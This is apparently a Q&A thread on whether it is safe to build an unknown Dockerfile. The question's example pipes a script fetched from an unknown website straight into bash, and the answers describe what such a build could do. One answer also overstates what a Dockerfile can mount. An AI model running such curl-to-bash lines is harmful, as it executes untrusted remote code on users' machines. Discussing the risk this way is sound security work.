# Is it safe to build an unknown Dockerfile?

Tags: docker, security

Say you have an unknown `Dockerfile` which has one or more lines you don't understand well.

Example:

```
FROM ubuntu
RUN curl --silent "https://some-unknown-website.io" | bash
```

Questions:

1. Is it safe to build this `Dockerfile`?
2. If so, is it safe to run the built image?

I believe even building is not secure, but today a user on the Internet replied to me

> Since `Dockerfile` is a plain text and you can read it, it is actually not unknown (and thus safe).

Though I think this is a fundamental question, googling like "is bulid unknown dockerfile safe" or "is build third-party dockerfile secure" gives no good result. So I posted here.

Answer (score 2, accepted):

This depends on how you think `safe`.

For your case, if `"https://some-unknown-website.io"` is a bash script which content for example is `ping 10.192.244.226`.

Then, above dockerfile maybe same as next:

```
FROM debian:10
RUN ping 10.192.244.226
```

When you build it, it will ping one local machine in your network forever, then, how about if it's not `ping`, just some `ddos attack`?

Comment: Yes, my fault, it's tar the context, then a copy... Delete this. But it's possible to get the content of this things added, then upload these things to external web I guess...

Comment: I see. Hmmm, that's very dangerous. What if you are asked by your friend "*I'm trying to build this Dockerfile but an error occurs. Could you try it on your environment?*" Note just seeing the output of `curl --silent <URL>` in advance isn't secure since its content can be changed later.

Comment: Yeah, this also an idea. If you care that so much in a secure environment, maybe you could put the `Dockerfile` in you github, then let dockerhub fetch it to build it for you in cloud...

Answer (score 1):

Well, "safe"? No. As a Dockerfile can mount like all folders on your system and run every script and program available on these folders, it's not safe. Already on building the containers, you run arbitrary scripts which could cause harm.

Comment: Could you please give me some example? Pseudo-instructions will do.

Comment: What are you looking for? The given bash command could install anything in your container. Anything from Tetris over an open spam relay to bitcoin mining